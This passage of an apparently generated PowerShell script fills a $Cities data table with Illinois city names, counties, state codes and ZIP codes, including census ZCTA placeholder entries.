$Cities.Rows.Add("Oakland","Coles","Illinois","IL","17","61943") + $null = $Cities.Rows.Add("Paris","Edgar","Illinois","IL","17","61944") + $null = $Cities.Rows.Add("Redmon","Edgar","Illinois","IL","17","61949") + $null = $Cities.Rows.Add("Sullivan","Moultrie","Illinois","IL","17","61951") + $null = $Cities.Rows.Add("Tuscola","Douglas","Illinois","IL","17","61953") + $null = $Cities.Rows.Add("Villa grove","Douglas","Illinois","IL","17","61956") + $null = $Cities.Rows.Add("Windsor","Shelby","Illinois","IL","17","61957") + $null = $Cities.Rows.Add("Zcta 619hh","Coles","Illinois","IL","17","619HH") + $null = $Cities.Rows.Add("Alhambra","Madison","Illinois","IL","17","62001") + $null = $Cities.Rows.Add("Alton","Madison","Illinois","IL","17","62002") + $null = $Cities.Rows.Add("Batchtown","Calhoun","Illinois","IL","17","62006") + $null = $Cities.Rows.Add("Benld","Macoupin","Illinois","IL","17","62009") + $null = $Cities.Rows.Add("Bethalto","Madison","Illinois","IL","17","62010") + $null = $Cities.Rows.Add("Bingham","Fayette","Illinois","IL","17","62011") + $null = $Cities.Rows.Add("Brighton","Macoupin","Illinois","IL","17","62012") + $null = $Cities.Rows.Add("Meppen","Calhoun","Illinois","IL","17","62013") + $null = $Cities.Rows.Add("Bunker hill","Macoupin","Illinois","IL","17","62014") + $null = $Cities.Rows.Add("Butler","Montgomery","Illinois","IL","17","62015") + $null = $Cities.Rows.Add("Carrollton","Greene","Illinois","IL","17","62016") + $null = $Cities.Rows.Add("Coffeen","Montgomery","Illinois","IL","17","62017") + $null = $Cities.Rows.Add("Cottage hills","Madison","Illinois","IL","17","62018") + $null = $Cities.Rows.Add("Donnellson","Montgomery","Illinois","IL","17","62019") + $null = $Cities.Rows.Add("Dorsey","Madison","Illinois","IL","17","62021") + $null = $Cities.Rows.Add("Dow","Jersey","Illinois","IL","17","62022") + $null = $Cities.Rows.Add("Eagarville","Macoupin","Illinois","IL","17","62023") + $null = $Cities.Rows.Add("East alton","Madison","Illinois","IL","17","62024") + $null = $Cities.Rows.Add("Edwardsville","Madison","Illinois","IL","17","62025") + $null = $Cities.Rows.Add("Eldred","Greene","Illinois","IL","17","62027") + $null = $Cities.Rows.Add("Elsah","Jersey","Illinois","IL","17","62028") + $null = $Cities.Rows.Add("Fidelity","Jersey","Illinois","IL","17","62030") + $null = $Cities.Rows.Add("Fieldon","Jersey","Illinois","IL","17","62031") + $null = $Cities.Rows.Add("Fillmore","Montgomery","Illinois","IL","17","62032") + $null = $Cities.Rows.Add("Dorchester","Macoupin","Illinois","IL","17","62033") + $null = $Cities.Rows.Add("Glen carbon","Madison","Illinois","IL","17","62034") + $null = $Cities.Rows.Add("Godfrey","Madison","Illinois","IL","17","62035") + $null = $Cities.Rows.Add("Golden eagle","Calhoun","Illinois","IL","17","62036") + $null = $Cities.Rows.Add("Grafton","Jersey","Illinois","IL","17","62037") + $null = $Cities.Rows.Add("Mitchell","Madison","Illinois","IL","17","62040") + $null = $Cities.Rows.Add("Greenfield","Greene","Illinois","IL","17","62044") + $null = $Cities.Rows.Add("Hamburg","Calhoun","Illinois","IL","17","62045") + $null = $Cities.Rows.Add("Hamel","Madison","Illinois","IL","17","62046") + $null = $Cities.Rows.Add("Hardin","Calhoun","Illinois","IL","17","62047") + $null = $Cities.Rows.Add("Hartford","Madison","Illinois","IL","17","62048") + $null = $Cities.Rows.Add("Hillsboro","Montgomery","Illinois","IL","17","62049") + $null = $Cities.Rows.Add("Hillview","Greene","Illinois","IL","17","62050") + $null = $Cities.Rows.Add("Irving","Montgomery","Illinois","IL","17","62051") + $null = $Cities.Rows.Add("Jerseyville","Jersey","Illinois","IL","17","62052") + $null = $Cities.Rows.Add("Kampsville","Calhoun","Illinois","IL","17","62053") + $null = $Cities.Rows.Add("Kane","Greene","Illinois","IL","17","62054") + $null = $Cities.Rows.Add("Litchfield","Montgomery","Illinois","IL","17","62056") + $null = $Cities.Rows.Add("Livingston","Madison","Illinois","IL","17","62058") + $null = $Cities.Rows.Add("Lovejoy","St. Clair","Illinois","IL","17","62059") + $null = $Cities.Rows.Add("Madison","Madison","Illinois","IL","17","62060") + $null = $Cities.Rows.Add("Marine","Madison","Illinois","IL","17","62061") + $null = $Cities.Rows.Add("Maryville","Madison","Illinois","IL","17","62062") + $null = $Cities.Rows.Add("Medora","Macoupin","Illinois","IL","17","62063") + $null = $Cities.Rows.Add("Michael","Calhoun","Illinois","IL","17","62065") + $null = $Cities.Rows.Add("Moro","Madison","Illinois","IL","17","62067") + $null = $Cities.Rows.Add("Mount olive","Macoupin","Illinois","IL","17","62069") + $null = $Cities.Rows.Add("Mozier","Calhoun","Illinois","IL","17","62070") + $null = $Cities.Rows.Add("New douglas","Madison","Illinois","IL","17","62074") + $null = $Cities.Rows.Add("Nokomis","Montgomery","Illinois","IL","17","62075") + $null = $Cities.Rows.Add("Panama","Montgomery","Illinois","IL","17","62077") + $null = $Cities.Rows.Add("Patterson","Greene","Illinois","IL","17","62078") + $null = $Cities.Rows.Add("Piasa","Macoupin","Illinois","IL","17","62079") + $null = $Cities.Rows.Add("Ramsey","Fayette","Illinois","IL","17","62080") + $null = $Cities.Rows.Add("Rockbridge","Greene","Illinois","IL","17","62081") + $null = $Cities.Rows.Add("Roodhouse","Greene","Illinois","IL","17","62082") + $null = $Cities.Rows.Add("Rosamond","Christian","Illinois","IL","17","62083") + $null = $Cities.Rows.Add("Roxana","Madison","Illinois","IL","17","62084") + $null = $Cities.Rows.Add("Sawyerville","Macoupin","Illinois","IL","17","62085") + $null = $Cities.Rows.Add("Sorento","Bond","Illinois","IL","17","62086") + $null = $Cities.Rows.Add("South roxana","Madison","Illinois","IL","17","62087") + $null = $Cities.Rows.Add("Staunton","Macoupin","Illinois","IL","17","62088") + $null = $Cities.Rows.Add("Taylor springs","Montgomery","Illinois","IL","17","62089") + $null = $Cities.Rows.Add("Venice","Madison","Illinois","IL","17","62090") + $null = $Cities.Rows.Add("Walshville","Montgomery","Illinois","IL","17","62091") + $null = $Cities.Rows.Add("White hall","Greene","Illinois","IL","17","62092") + $null = $Cities.Rows.Add("Wilsonville","Macoupin","Illinois","IL","17","62093") + $null = $Cities.Rows.Add("Witt","Montgomery","Illinois","IL","17","62094") + $null = $Cities.Rows.Add("Wood river","Madison","Illinois","IL","17","62095") + $null = $Cities.Rows.Add("Worden","Madison","Illinois","IL","17","62097") + $null = $Cities.Rows.Add("Zcta 620hh","Calhoun","Illinois","IL","17","620HH") + $null = $Cities.Rows.Add("Sauget","St. Clair","Illinois","IL","17","62201") + $null = $Cities.Rows.Add("East saint louis","St. Clair","Illinois","IL","17","62203") + $null = $Cities.Rows.Add("Washington park","St. Clair","Illinois","IL","17","62204") + $null = $Cities.Rows.Add("East saint louis","St. Clair","Illinois","IL","17","62205") + $null = $Cities.Rows.Add("Cahokia","St. Clair","Illinois","IL","17","62206") + $null = $Cities.Rows.Add("Alorton","St. Clair","Illinois","IL","17","62207") + $null = $Cities.Rows.Add("Fairview heights","St. Clair","Illinois","IL","17","62208") + $null = $Cities.Rows.Add("Venedy","Washington","Illinois","IL","17","62214") + $null = $Cities.Rows.Add("Albers","Clinton","Illinois","IL","17","62215") + $null = $Cities.Rows.Add("Aviston","Clinton","Illinois","IL","17","62216") + $null = $Cities.Rows.Add("Baldwin","Randolph","Illinois","IL","17","62217") + $null = $Cities.Rows.Add("Bartelso","Clinton","Illinois","IL","17","62218") + $null = $Cities.Rows.Add("Beckemeyer","Clinton","Illinois","IL","17","62219") + $null = $Cities.Rows.Add("Belleville","St. Clair","Illinois","IL","17","62220") + $null = $Cities.Rows.Add("Belleville","St. Clair","Illinois","IL","17","62221") + $null = $Cities.Rows.Add("Belleville","St. Clair","Illinois","IL","17","62223") + $null = $Cities.Rows.Add("Scott a f b","St. Clair","Illinois","IL","17","62225") + $null = $Cities.Rows.Add("Zcta 62226","St. Clair","Illinois","IL","17","62226") + $null = $Cities.Rows.Add("Breese","Clinton","Illinois","IL","17","62230") + $null = $Cities.Rows.Add("Carlyle","Clinton","Illinois","IL","17","62231") + $null = $Cities.Rows.Add("Caseyville","St. Clair","Illinois","IL","17","62232") + $null = $Cities.Rows.Add("Chester","Randolph","Illinois","IL","17","62233") + $null = $Cities.Rows.Add("Collinsville","Madison","Illinois","IL","17","62234") + $null = $Cities.Rows.Add("Columbia","Monroe","Illinois","IL","17","62236") + $null = $Cities.Rows.Add("Swanwick","Randolph","Illinois","IL","17","62237") + $null = $Cities.Rows.Add("Cutler","Perry","Illinois","IL","17","62238") + $null = $Cities.Rows.Add("Dupo","St. Clair","Illinois","IL","17","62239") + $null = $Cities.Rows.Add("East carondelet","St. Clair","Illinois","IL","17","62240") + $null = $Cities.Rows.Add("Ellis grove","Randolph","Illinois","IL","17","62241") + $null = $Cities.Rows.Add("Evansville","Randolph","Illinois","IL","17","62242") + $null = $Cities.Rows.Add("Freeburg","St. Clair","Illinois","IL","17","62243") + $null = $Cities.Rows.Add("Fults","Monroe","Illinois","IL","17","62244") + $null = $Cities.Rows.Add("Germantown","Clinton","Illinois","IL","17","62245") + $null = $Cities.Rows.Add("Greenville","Bond","Illinois","IL","17","62246") + $null = $Cities.Rows.Add("Highland","Madison","Illinois","IL","17","62249") + $null = $Cities.Rows.Add("Hoffman","Clinton","Illinois","IL","17","62250") + $null = $Cities.Rows.Add("Keyesport","Bond","Illinois","IL","17","62253") + $null = $Cities.Rows.Add("Lebanon","St. Clair","Illinois","IL","17","62254") + $null = $Cities.Rows.Add("Lenzburg","St. Clair","Illinois","IL","17","62255") + $null = $Cities.Rows.Add("Marissa","St. Clair","Illinois","IL","17","62257") + $null = $Cities.Rows.Add("Mascoutah","St. Clair","Illinois","IL","17","62258") + $null = $Cities.Rows.Add("Millstadt","St. Clair","Illinois","IL","17","62260") + $null = $Cities.Rows.Add("Modoc","Randolph","Illinois","IL","17","62261") + $null = $Cities.Rows.Add("Mulberry grove","Bond","Illinois","IL","17","62262") + $null = $Cities.Rows.Add("Nashville","Washington","Illinois","IL","17","62263") + $null = $Cities.Rows.Add("New athens","St. Clair","Illinois","IL","17","62264") + $null = $Cities.Rows.Add("New baden","Clinton","Illinois","IL","17","62265") + $null = $Cities.Rows.Add("New memphis","Clinton","Illinois","IL","17","62266") + $null = $Cities.Rows.Add("Oakdale","Washington","Illinois","IL","17","62268") + $null = $Cities.Rows.Add("Shiloh","St. Clair","Illinois","IL","17","62269") + $null = $Cities.Rows.Add("Okawville","Washington","Illinois","IL","17","62271") + $null = $Cities.Rows.Add("Percy","Randolph","Illinois","IL","17","62272") + $null = $Cities.Rows.Add("Pierron","Bond","Illinois","IL","17","62273") + $null = $Cities.Rows.Add("Pinckneyville","Perry","Illinois","IL","17","62274") + $null = $Cities.Rows.Add("Pocahontas","Bond","Illinois","IL","17","62275") + $null = $Cities.Rows.Add("Prairie du roche","Randolph","Illinois","IL","17","62277") + $null = $Cities.Rows.Add("Red bud","Randolph","Illinois","IL","17","62278") + $null = $Cities.Rows.Add("Renault","Monroe","Illinois","IL","17","62279") + $null = $Cities.Rows.Add("Rockwood","Randolph","Illinois","IL","17","62280") + $null = $Cities.Rows.Add("Saint jacob","Madison","Illinois","IL","17","62281") + $null = $Cities.Rows.Add("Shattuc","Clinton","Illinois","IL","17","62283") + $null = $Cities.Rows.Add("Smithboro","Bond","Illinois","IL","17","62284") + $null = $Cities.Rows.Add("Smithton","St. Clair","Illinois","IL","17","62285") + $null = $Cities.Rows.Add("Sparta","Randolph","Illinois","IL","17","62286") + $null = $Cities.Rows.Add("Steeleville","Randolph","Illinois","IL","17","62288") + $null = $Cities.Rows.Add("Summerfield","St. Clair","Illinois","IL","17","62289") + $null = $Cities.Rows.Add("Tilden","Randolph","Illinois","IL","17","62292") + $null = $Cities.Rows.Add("Trenton","Clinton","Illinois","IL","17","62293") + $null = $Cities.Rows.Add("Troy","Madison","Illinois","IL","17","62294") + $null = $Cities.Rows.Add("Valmeyer","Monroe","Illinois","IL","17","62295") + $null = $Cities.Rows.Add("Walsh","Randolph","Illinois","IL","17","62297") + $null = $Cities.Rows.Add("Waterloo","Monroe","Illinois","IL","17","62298") + $null = $Cities.Rows.Add("Zcta 622hh","Clinton","Illinois","IL","17","622HH") + $null = $Cities.Rows.Add("Quincy","Adams","Illinois","IL","17","62301") + $null = $Cities.Rows.Add("Augusta","Hancock","Illinois","IL","17","62311") + $null = $Cities.Rows.Add("Barry","Pike","Illinois","IL","17","62312") + $null = $Cities.Rows.Add("Basco","Hancock","Illinois","IL","17","62313") + $null = $Cities.Rows.Add("Baylis","Pike","Illinois","IL","17","62314") + $null = $Cities.Rows.Add("Bowen","Hancock","Illinois","IL","17","62316") + $null = $Cities.Rows.Add("Burnside","Hancock","Illinois","IL","17","62318") + $null = $Cities.Rows.Add("Camden","Schuyler","Illinois","IL","17","62319") + $null = $Cities.Rows.Add("Camp point","Adams","Illinois","IL","17","62320") + $null = $Cities.Rows.Add("Carthage","Hancock","Illinois","IL","17","62321") + $null = $Cities.Rows.Add("Chambersburg","Pike","Illinois","IL","17","62323") + $null = $Cities.Rows.Add("Clayton","Adams","Illinois","IL","17","62324") + $null = $Cities.Rows.Add("Coatsburg","Adams","Illinois","IL","17","62325") + $null = $Cities.Rows.Add("Colchester","McDonough","Illinois","IL","17","62326") + $null = $Cities.Rows.Add("Pontoosuc","Hancock","Illinois","IL","17","62330") + $null = $Cities.Rows.Add("Elvaston","Hancock","Illinois","IL","17","62334") + $null = $Cities.Rows.Add("Ferris","Hancock","Illinois","IL","17","62336") + $null = $Cities.Rows.Add("Fowler","Adams","Illinois","IL","17","62338") + $null = $Cities.Rows.Add("Golden","Adams","Illinois","IL","17","62339") + $null = $Cities.Rows.Add("Griggsville","Pike","Illinois","IL","17","62340") + $null = $Cities.Rows.Add("Hamilton","Hancock","Illinois","IL","17","62341") + $null = $Cities.Rows.Add("Hull","Pike","Illinois","IL","17","62343") + $null = $Cities.Rows.Add("Huntsville","Schuyler","Illinois","IL","17","62344") + $null = $Cities.Rows.Add("Kinderhook","Pike","Illinois","IL","17","62345") + $null = $Cities.Rows.Add("La prairie","Adams","Illinois","IL","17","62346") + $null = $Cities.Rows.Add("Liberty","Adams","Illinois","IL","17","62347") + $null = $Cities.Rows.Add("Lima","Adams","Illinois","IL","17","62348") + $null = $Cities.Rows.Add("Loraine","Adams","Illinois","IL","17","62349") + $null = $Cities.Rows.Add("Mendon","Adams","Illinois","IL","17","62351") + $null = $Cities.Rows.Add("Milton","Pike","Illinois","IL","17","62352") + $null = $Cities.Rows.Add("Mount sterling","Brown","Illinois","IL","17","62353") + $null = $Cities.Rows.Add("Nauvoo","Hancock","Illinois","IL","17","62354") + $null = $Cities.Rows.Add("Nebo","Pike","Illinois","IL","17","62355") + $null = $Cities.Rows.Add("New canton","Pike","Illinois","IL","17","62356") + $null = $Cities.Rows.Add("New salem","Pike","Illinois","IL","17","62357") + $null = $Cities.Rows.Add("Niota","Hancock","Illinois","IL","17","62358") + $null = $Cities.Rows.Add("Paloma","Adams","Illinois","IL","17","62359") + $null = $Cities.Rows.Add("Payson","Adams","Illinois","IL","17","62360") + $null = $Cities.Rows.Add("Pearl","Pike","Illinois","IL","17","62361") + $null = $Cities.Rows.Add("Perry","Pike","Illinois","IL","17","62362") + $null = $Cities.Rows.Add("Pittsfield","Pike","Illinois","IL","17","62363") + $null = $Cities.Rows.Add("Plainville","Adams","Illinois","IL","17","62365") + $null = $Cities.Rows.Add("Pleasant hill","Pike","Illinois","IL","17","62366") + $null = $Cities.Rows.Add("Colmar","Hancock","Illinois","IL","17","62367") + $null = $Cities.Rows.Add("Rockport","Pike","Illinois","IL","17","62370") + $null = $Cities.Rows.Add("Sutter","Hancock","Illinois","IL","17","62373") + $null = $Cities.Rows.Add("Tennessee","McDonough","Illinois","IL","17","62374") + $null = $Cities.Rows.Add("Timewell","Brown","Illinois","IL","17","62375") + $null = $Cities.Rows.Add("Ursa","Adams","Illinois","IL","17","62376") + $null = $Cities.Rows.Add("Versailles","Brown","Illinois","IL","17","62378") + $null = $Cities.Rows.Add("Warsaw","Hancock","Illinois","IL","17","62379") + $null = $Cities.Rows.Add("West point","Hancock","Illinois","IL","17","62380") + $null = $Cities.Rows.Add("Zcta 623hh","Adams","Illinois","IL","17","623HH") + $null = $Cities.Rows.Add("Effingham","Effingham","Illinois","IL","17","62401") + $null = $Cities.Rows.Add("Allendale","Wabash","Illinois","IL","17","62410") + $null = $Cities.Rows.Add("Altamont","Effingham","Illinois","IL","17","62411") + $null = $Cities.Rows.Add("Annapolis","Crawford","Illinois","IL","17","62413") + $null = $Cities.Rows.Add("Beecher city","Effingham","Illinois","IL","17","62414") + $null = $Cities.Rows.Add("Bridgeport","Lawrence","Illinois","IL","17","62417") + $null = $Cities.Rows.Add("Brownstown","Fayette","Illinois","IL","17","62418") + $null = $Cities.Rows.Add("Calhoun","Richland","Illinois","IL","17","62419") + $null = $Cities.Rows.Add("Casey","Clark","Illinois","IL","17","62420") + $null = $Cities.Rows.Add("Claremont","Richland","Illinois","IL","17","62421") + $null = $Cities.Rows.Add("Cowden","Shelby","Illinois","IL","17","62422") + $null = $Cities.Rows.Add("Dennison","Clark","Illinois","IL","17","62423") + $null = $Cities.Rows.Add("Dieterich","Effingham","Illinois","IL","17","62424") + $null = $Cities.Rows.Add("Dundas","Richland","Illinois","IL","17","62425") + $null = $Cities.Rows.Add("Laclede","Effingham","Illinois","IL","17","62426") + $null = $Cities.Rows.Add("Flat rock","Crawford","Illinois","IL","17","62427") + $null = $Cities.Rows.Add("Hazel dell","Cumberland","Illinois","IL","17","62428") + $null = $Cities.Rows.Add("Herrick","Shelby","Illinois","IL","17","62431") + $null = $Cities.Rows.Add("Hidalgo","Jasper","Illinois","IL","17","62432") + $null = $Cities.Rows.Add("Hutsonville","Crawford","Illinois","IL","17","62433") + $null = $Cities.Rows.Add("Ingraham","Clay","Illinois","IL","17","62434") + $null = $Cities.Rows.Add("Jewett","Cumberland","Illinois","IL","17","62436") + $null = $Cities.Rows.Add("Lakewood","Shelby","Illinois","IL","17","62438") + $null = $Cities.Rows.Add("Lawrenceville","Lawrence","Illinois","IL","17","62439") + $null = $Cities.Rows.Add("Lerna","Coles","Illinois","IL","17","62440") + $null = $Cities.Rows.Add("Marshall","Clark","Illinois","IL","17","62441") + $null = $Cities.Rows.Add("Martinsville","Clark","Illinois","IL","17","62442") + $null = $Cities.Rows.Add("Mason","Effingham","Illinois","IL","17","62443") + $null = $Cities.Rows.Add("Mode","Shelby","Illinois","IL","17","62444") + $null = $Cities.Rows.Add("Montrose","Cumberland","Illinois","IL","17","62445") + $null = $Cities.Rows.Add("Mount erie","Wayne","Illinois","IL","17","62446") + $null = $Cities.Rows.Add("Neoga","Cumberland","Illinois","IL","17","62447") + $null = $Cities.Rows.Add("Newton","Jasper","Illinois","IL","17","62448") + $null = $Cities.Rows.Add("Oblong","Crawford","Illinois","IL","17","62449") + $null = $Cities.Rows.Add("Olney","Richland","Illinois","IL","17","62450") + $null = $Cities.Rows.Add("Palestine","Crawford","Illinois","IL","17","62451") + $null = $Cities.Rows.Add("Parkersburg","Richland","Illinois","IL","17","62452") + $null = $Cities.Rows.Add("Robinson","Crawford","Illinois","IL","17","62454") + $null = $Cities.Rows.Add("Saint elmo","Fayette","Illinois","IL","17","62458") + $null = $Cities.Rows.Add("Sainte marie","Jasper","Illinois","IL","17","62459") + $null = $Cities.Rows.Add("Saint francisvil","Lawrence","Illinois","IL","17","62460") + $null = $Cities.Rows.Add("Shumway","Effingham","Illinois","IL","17","62461") + $null = $Cities.Rows.Add("Sigel","Shelby","Illinois","IL","17","62462") + $null = $Cities.Rows.Add("Stewardson","Shelby","Illinois","IL","17","62463") + $null = $Cities.Rows.Add("Strasburg","Shelby","Illinois","IL","17","62465") + $null = $Cities.Rows.Add("Sumner","Lawrence","Illinois","IL","17","62466") + $null = $Cities.Rows.Add("Teutopolis","Effingham","Illinois","IL","17","62467") + $null = $Cities.Rows.Add("Toledo","Cumberland","Illinois","IL","17","62468") + $null = $Cities.Rows.Add("Trilla","Cumberland","Illinois","IL","17","62469") + $null = $Cities.Rows.Add("Vandalia","Fayette","Illinois","IL","17","62471") + $null = $Cities.Rows.Add("Watson","Effingham","Illinois","IL","17","62473") + $null = $Cities.Rows.Add("Westfield","Clark","Illinois","IL","17","62474") + $null = $Cities.Rows.Add("West liberty","Jasper","Illinois","IL","17","62475") + $null = $Cities.Rows.Add("West salem","Edwards","Illinois","IL","17","62476") + $null = $Cities.Rows.Add("West union","Clark","Illinois","IL","17","62477") + $null = $Cities.Rows.Add("West york","Crawford","Illinois","IL","17","62478") + $null = $Cities.Rows.Add("Wheeler","Jasper","Illinois","IL","17","62479") + $null = $Cities.Rows.Add("Willow hill","Jasper","Illinois","IL","17","62480") + $null = $Cities.Rows.Add("Yale","Jasper","Illinois","IL","17","62481") + $null = $Cities.Rows.Add("Zcta 624hh","Clark","Illinois","IL","17","624HH") + $null = $Cities.Rows.Add("Newburg","Macon","Illinois","IL","17","62501") + $null = $Cities.Rows.Add("Assumption","Christian","Illinois","IL","17","62510") + $null = $Cities.Rows.Add("Atwater","Macoupin","Illinois","IL","17","62511") + $null = $Cities.Rows.Add("Beason","Logan","Illinois","IL","17","62512") + $null = $Cities.Rows.Add("Blue mound","Macon","Illinois","IL","17","62513") + $null = $Cities.Rows.Add("Boody","Macon","Illinois","IL","17","62514") + $null = $Cities.Rows.Add("Buffalo hart","Sangamon","Illinois","IL","17","62515") + $null = $Cities.Rows.Add("Bulpitt","Christian","Illinois","IL","17","62517") + $null = $Cities.Rows.Add("Chestnut","Logan","Illinois","IL","17","62518") + $null = $Cities.Rows.Add("Cornland","Logan","Illinois","IL","17","62519") + $null = $Cities.Rows.Add("Dawson","Sangamon","Illinois","IL","17","62520") + $null = $Cities.Rows.Add("Decatur","Macon","Illinois","IL","17","62521") + $null = $Cities.Rows.Add("Decatur","Macon","Illinois","IL","17","62522") + $null = $Cities.Rows.Add("Decatur","Macon","Illinois","IL","17","62523") + $null = $Cities.Rows.Add("Bearsdale","Macon","Illinois","IL","17","62526") + $null = $Cities.Rows.Add("Cimic","Sangamon","Illinois","IL","17","62530") + $null = $Cities.Rows.Add("Edinburg","Christian","Illinois","IL","17","62531") + $null = $Cities.Rows.Add("Elwin","Macon","Illinois","IL","17","62532") + $null = $Cities.Rows.Add("Thomasville","Montgomery","Illinois","IL","17","62533") + $null = $Cities.Rows.Add("Brunswick","Shelby","Illinois","IL","17","62534") + $null = $Cities.Rows.Add("Forsyth","Macon","Illinois","IL","17","62535") + $null = $Cities.Rows.Add("Glenarm","Sangamon","Illinois","IL","17","62536") + $null = $Cities.Rows.Add("Harristown","Macon","Illinois","IL","17","62537") + $null = $Cities.Rows.Add("Harvel","Montgomery","Illinois","IL","17","62538") + $null = $Cities.Rows.Add("Illiopolis","Sangamon","Illinois","IL","17","62539") + $null = $Cities.Rows.Add("Kincaid","Christian","Illinois","IL","17","62540") + $null = $Cities.Rows.Add("Lake fork","Logan","Illinois","IL","17","62541") + $null = $Cities.Rows.Add("Latham","Logan","Illinois","IL","17","62543") + $null = $Cities.Rows.Add("Macon","Macon","Illinois","IL","17","62544") + $null = $Cities.Rows.Add("Bolivia","Sangamon","Illinois","IL","17","62545") + $null = $Cities.Rows.Add("Morrisonville","Christian","Illinois","IL","17","62546") + $null = $Cities.Rows.Add("Mount auburn","Christian","Illinois","IL","17","62547") + $null = $Cities.Rows.Add("Mount pulaski","Logan","Illinois","IL","17","62548") + $null = $Cities.Rows.Add("Hervey city","Macon","Illinois","IL","17","62549") + $null = $Cities.Rows.Add("Radford","Shelby","Illinois","IL","17","62550") + $null = $Cities.Rows.Add("Niantic","Macon","Illinois","IL","17","62551") + $null = $Cities.Rows.Add("Casner","Macon","Illinois","IL","17","62552") + $null = $Cities.Rows.Add("Oconee","Shelby","Illinois","IL","17","62553") + $null = $Cities.Rows.Add("Oreana","Macon","Illinois","IL","17","62554") + $null = $Cities.Rows.Add("Owaneco","Christian","Illinois","IL","17","62555") + $null = $Cities.Rows.Add("Clarksdale","Christian","Illinois","IL","17","62556") + $null = $Cities.Rows.Add("Dunkel","Christian","Illinois","IL","17","62557") + $null = $Cities.Rows.Add("Sicily","Sangamon","Illinois","IL","17","62558") + $null = $Cities.Rows.Add("Raymond","Montgomery","Illinois","IL","17","62560") + $null = $Cities.Rows.Add("Spaulding","Sangamon","Illinois","IL","17","62561") + $null = $Cities.Rows.Add("Berry","Sangamon","Illinois","IL","17","62563") + $null = $Cities.Rows.Add("Clarksburg","Shelby","Illinois","IL","17","62565") + $null = $Cities.Rows.Add("Stonington","Christian","Illinois","IL","17","62567") + $null = $Cities.Rows.Add("Hewittsville","Christian","Illinois","IL","17","62568") + $null = $Cities.Rows.Add("Tovey","Christian","Illinois","IL","17","62570") + $null = $Cities.Rows.Add("Dollville","Shelby","Illinois","IL","17","62571") + $null = $Cities.Rows.Add("Waggoner","Montgomery","Illinois","IL","17","62572") + $null = $Cities.Rows.Add("Heman","Macon","Illinois","IL","17","62573") + $null = $Cities.Rows.Add("Zcta 625hh","Macon","Illinois","IL","17","625HH") + $null = $Cities.Rows.Add("Orleans","Morgan","Illinois","IL","17","62601") + $null = $Cities.Rows.Add("Alsey","Scott","Illinois","IL","17","62610") + $null = $Cities.Rows.Add("Arenzville","Cass","Illinois","IL","17","62611") + $null = $Cities.Rows.Add("Newmansville","Cass","Illinois","IL","17","62612") + $null = $Cities.Rows.Add("Fancy prairie","Menard","Illinois","IL","17","62613") + $null = $Cities.Rows.Add("Auburn","Sangamon","Illinois","IL","17","62615") + $null = $Cities.Rows.Add("Lynchburg","Mason","Illinois","IL","17","62617") + $null = $Cities.Rows.Add("Beardstown","Cass","Illinois","IL","17","62618") + $null = $Cities.Rows.Add("Exeter","Scott","Illinois","IL","17","62621") + $null = $Cities.Rows.Add("Bader","Schuyler","Illinois","IL","17","62624") + $null = $Cities.Rows.Add("Cantrall","Sangamon","Illinois","IL","17","62625") + $null = $Cities.Rows.Add("Comer","Macoupin","Illinois","IL","17","62626") + $null = $Cities.Rows.Add("Panther creek","Cass","Illinois","IL","17","62627") + $null = $Cities.Rows.Add("Chapin","Morgan","Illinois","IL","17","62628") + $null = $Cities.Rows.Add("Chatham","Sangamon","Illinois","IL","17","62629") + $null = $Cities.Rows.Add("Hagaman","Macoupin","Illinois","IL","17","62630") + $null = $Cities.Rows.Add("Concord","Morgan","Illinois","IL","17","62631") + $null = $Cities.Rows.Add("Biggs","Mason","Illinois","IL","17","62633") + $null = $Cities.Rows.Add("Broadwell","Logan","Illinois","IL","17","62634") + $null = $Cities.Rows.Add("Emden","Logan","Illinois","IL","17","62635") + $null = $Cities.Rows.Add("Clements","Morgan","Illinois","IL","17","62638") + $null = $Cities.Rows.Add("Frederick","Schuyler","Illinois","IL","17","62639") + $null = $Cities.Rows.Add("Mcvey","Macoupin","Illinois","IL","17","62640") + $null = $Cities.Rows.Add("Hubly","Menard","Illinois","IL","17","62642") + $null = $Cities.Rows.Add("Hartsburg","Logan","Illinois","IL","17","62643") + $null = $Cities.Rows.Add("Eckard","Mason","Illinois","IL","17","62644") + $null = $Cities.Rows.Add("Hettick","Macoupin","Illinois","IL","17","62649") + $null = $Cities.Rows.Add("Arcadia","Morgan","Illinois","IL","17","62650") + $null = $Cities.Rows.Add("Kilbourne","Mason","Illinois","IL","17","62655") + $null = $Cities.Rows.Add("Lincoln","Logan","Illinois","IL","17","62656") + $null = $Cities.Rows.Add("Loami","Sangamon","Illinois","IL","17","62661") + $null = $Cities.Rows.Add("Manchester","Scott","Illinois","IL","17","62663") + $null = $Cities.Rows.Add("Luther","Mason","Illinois","IL","17","62664") + $null = $Cities.Rows.Add("Naples","Morgan","Illinois","IL","17","62665") + $null = $Cities.Rows.Add("Middletown","Logan","Illinois","IL","17","62666") + $null = $Cities.Rows.Add("Modesto","Macoupin","Illinois","IL","17","62667") + $null = $Cities.Rows.Add("Nortonville","Morgan","Illinois","IL","17","62668") + $null = $Cities.Rows.Add("Bates","Sangamon","Illinois","IL","17","62670") + $null = $Cities.Rows.Add("New holland","Logan","Illinois","IL","17","62671") + $null = $Cities.Rows.Add("Nilwood","Macoupin","Illinois","IL","17","62672") + $null = $Cities.Rows.Add("Oakford","Menard","Illinois","IL","17","62673") + $null = $Cities.Rows.Add("Barr","Macoupin","Illinois","IL","17","62674") + $null = $Cities.Rows.Add("Atterbury","Menard","Illinois","IL","17","62675") + $null = $Cities.Rows.Add("Farmingdale","Sangamon","Illinois","IL","17","62677") + $null = $Cities.Rows.Add("Layton","Schuyler","Illinois","IL","17","62681") + $null = $Cities.Rows.Add("Allen","Mason","Illinois","IL","17","62682") + $null = $Cities.Rows.Add("Barclay","Sangamon","Illinois","IL","17","62684") + $null = $Cities.Rows.Add("Royal lakes","Macoupin","Illinois","IL","17","62685") + $null = $Cities.Rows.Add("South standard","Macoupin","Illinois","IL","17","62686") + $null = $Cities.Rows.Add("Tallula","Menard","Illinois","IL","17","62688") + $null = $Cities.Rows.Add("Thayer","Sangamon","Illinois","IL","17","62689") + $null = $Cities.Rows.Add("Virden","Macoupin","Illinois","IL","17","62690") + $null = $Cities.Rows.Add("Little indian","Cass","Illinois","IL","17","62691") + $null = $Cities.Rows.Add("Waverly","Morgan","Illinois","IL","17","62692") + $null = $Cities.Rows.Add("Williamsville","Sangamon","Illinois","IL","17","62693") + $null = $Cities.Rows.Add("Glasgow","Scott","Illinois","IL","17","62694") + $null = $Cities.Rows.Add("Woodson","Morgan","Illinois","IL","17","62695") + $null = $Cities.Rows.Add("Zcta 626hh","Cass","Illinois","IL","17","626HH") + $null = 